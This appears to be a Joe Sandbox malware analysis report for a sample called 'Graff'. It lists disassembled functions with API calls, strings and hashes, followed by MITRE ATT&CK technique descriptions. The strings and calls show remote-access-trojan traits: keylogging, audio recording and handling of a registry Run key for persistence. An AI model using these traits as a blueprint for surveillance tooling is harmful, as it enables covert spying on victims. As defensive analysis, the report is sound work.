Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E

Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000655C

Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7

Strings

*?, xrefs: 10006433
., xrefs: 10006713

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50

Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59

Strings

, xrefs: 0044DB9E
fD, xrefs: 0044DB4B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Info
String ID: $fD
API String ID: 1807457897-3092946448
Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65

Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55

Strings

image/jpeg, xrefs: 00417C1F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/jpeg
API String ID: 1369699375-3785015651
Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6

Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9

Strings

ACP, xrefs: 004508FC
OCP, xrefs: 00450932

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358

Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19

Strings

image/png, xrefs: 00417D0B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/png
API String ID: 1369699375-2966254431
Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6

Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E

Strings

KeepAlive | Enabled | Timeout: , xrefs: 004049E5

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: b465696090d91617a64cb819cd204dd094d184aea48da398ec55d58aea0939b7
Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
Opcode Fuzzy Hash: b465696090d91617a64cb819cd204dd094d184aea48da398ec55d58aea0939b7
Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F

Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001719

Strings

Se., xrefs: 100016E5
: , xrefs: 100016B3

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _strlen
String ID: : $Se.
API String ID: 4218353326-4089948878
Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765

Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

%02i:%02i:%02i:%03i , xrefs: 0041A6B5
| , xrefs: 0041A6D3

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: fc5bb5f7e5ac961d2e2c580d53b13272a59de4e70e0126d602fcaf30b0de9439
Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
Opcode Fuzzy Hash: fc5bb5f7e5ac961d2e2c580d53b13272a59de4e70e0126d602fcaf30b0de9439
Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E

Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE

Strings

xIG, xrefs: 00419EB8
alarm.wav, xrefs: 00419E99

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$xIG
API String ID: 1174141254-4080756945
Opcode ID: f5f924f0131290973494a8e0eadf160ea67a5e7c1f667f795b35b3652c8962bf
Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
Opcode Fuzzy Hash: f5f924f0131290973494a8e0eadf160ea67a5e7c1f667f795b35b3652c8962bf
Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF

Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 10002903

Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632

__CxxThrowException@8.LIBVCRUNTIME ref: 10002920

Strings

Unknown exception, xrefs: 1000292D

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

CloseHandle.KERNEL32(?), ref: 0040A7CA
UnhookWindowsHookEx.USER32 ref: 0040A7DD

Strings

Online Keylogger Stopped, xrefs: 0040A777, 0040A77F, 0040A7A6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 7d3e682849fd68cdcb17ff725c61de1d927436c196933aeb7fc39c965b8255f5
Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
Opcode Fuzzy Hash: 7d3e682849fd68cdcb17ff725c61de1d927436c196933aeb7fc39c965b8255f5
Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB

Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(015C04C8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
waveInAddBuffer.WINMM(015C04C8,00000020,?,00000000,00401913), ref: 0040175D

Strings

T=G, xrefs: 004016F6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: T=G
API String ID: 2315374483-379896819
Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98

Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC

Strings

j=D, xrefs: 004477D3, 004477C0
IsValidLocaleName, xrefs: 004477A1, 004477AB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$j=D
API String ID: 1901932003-3128777819
Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC

Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401D96

Strings

T=G, xrefs: 00401DB7
T=G, xrefs: 00401DDB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: T=G$T=G
API String ID: 3519838083-3732185208
Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D

Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040AD5B

Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84

Strings

[AltL], xrefs: 0040AD9D
[AltR], xrefs: 0040AD91

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB

Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448825

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

Strings

`@, xrefs: 00448808
`@, xrefs: 00448809

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID: `@$`@
API String ID: 1353095263-20545824
Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40

Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040ADB5

Strings

[CtrlR], xrefs: 0040ADD2
[CtrlL], xrefs: 0040ADE3

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB

Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658

Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

Strings

pth_unenc, xrefs: 00411699

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C

Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
GetLastError.KERNEL32 ref: 0043FB02
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
